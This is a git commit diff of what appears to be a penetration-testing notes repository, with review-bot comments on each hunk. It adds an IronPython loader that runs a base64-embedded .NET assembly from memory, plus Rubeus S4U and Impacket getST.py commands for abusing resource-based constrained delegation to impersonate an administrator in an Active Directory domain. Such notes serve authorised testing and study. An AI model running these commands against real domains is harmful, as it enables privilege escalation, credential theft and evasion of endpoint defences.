[AHK] Automatic update 👽
snovvcrash committed Oct 4, 2022
1 parent 9eb122c commit ca856b4
Showing 2 changed files with 17 additions and 2 deletions.
Expand Up @@ -76,14 +76,16 @@ You will need:
{% code title="loader.py" %}
```python
# ipy.exe .\loader.py

import clr

clr.AddReference('System')
from System import *
from System.Reflection import *

assembly = Assembly.LoadFrom('C:\\Tools\\Loader.exe')
b64 = '<LOADER_BYTES_B64>'
raw = Convert.FromBase64String(b64)

assembly = Assembly.Load(raw)
type = assembly.GetType('Loader.Program')
type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)
```
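Review bot: `<LOADER_BYTES_B64>` is introduced without any explanation in this hunk; add a sentence above the snippet saying it holds the base64 of the assembly that the removed `Assembly.LoadFrom('C:\\Tools\\Loader.exe')` line used to read from disk, so readers know what to substitute and why the file path is gone. Minor: `type = assembly.GetType('Loader.Program')` shadows Python's built-in `type`; `prog_type` or similar avoids that, and `from System import *` could be narrowed to `Convert` and `Activator`, the only names the script uses from that namespace.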
13 changes: 13 additions & 0 deletions pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd.md
Expand Up @@ -203,6 +203,8 @@ $ secretsdump.py DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt' -dc-ip 192.

- [https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)

{% tabs %}
{% tab title="Windows" %}
User **j.doe** is populated within the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the **SRV01** machine:

```
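Review bot: the wording `User **j.doe** is populated within the ... property of the **SRV01** machine` is awkward; `User **j.doe** has been written into the ... attribute of the **SRV01** computer object` reads more naturally and uses the AD term (attribute, not property). The `{% tabs %}` and `{% tab title="Windows" %}` opened here are closed in the next hunk, so the GitBook block balances.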
Expand Down Expand Up @@ -238,6 +240,13 @@ Go for the S4U attack providing the initial TGT within the `/ticket` option and
```
PS > .\Rubeus.exe s4u /msdsspn:host/SRV01.megacorp.local /altservice:http /ticket:<TGT> /tgs:<TGS> /createnetonly:C:\Windows\System32\cmd.exe /show
```
{% endtab %}
{% tab title="Linux" %}
From Linux systems [Impacket](https://github.com/SecureAuthCorp/impacket/pull/1202#issuecomment-1257289045) can be used to operate the technique.

The steps detailed on [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users) can be followed.
{% endtab %}
{% endtabs %}



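Review bot: the Linux tab only links out (to an Impacket pull-request comment and to The Hacker Recipes) while the Windows tab shows the actual Rubeus invocation; for parity, state which Impacket version or branch contains the support discussed under pull/1202 and show the matching `getST.py` command inline, since a link to a PR comment can go stale. Minor: the three blank lines after `{% endtabs %}` can be collapsed to one.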
Expand All @@ -260,6 +269,10 @@ PS > .\Rubeus.exe s4u /u2u /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /im
- [https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
- [https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync](https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync)

```
$ getST.py megacorp.local/'PC01$' -hashes :`pypykatz crypto nt 'Passw0rd!'` -dc-ip 192.168.1.11 -impersonate administrator -altservice CIFS/PC01.megacorp.local -self
```



### sAMAccountName Spoofing (noPac)
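Review bot: the new `getST.py` block is placed directly under the reference list with no sentence saying what it demonstrates (the `-self` / `-altservice` counterpart of the Rubeus `/u2u` command shown earlier in this section), so it reads as an orphaned snippet; add a one-line lead-in. Worth a short remark too: `'PC01$'` is single-quoted so the shell does not expand `$`, which is easy to lose when copying the line. The three blank lines before `### sAMAccountName Spoofing (noPac)` can be reduced to one.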
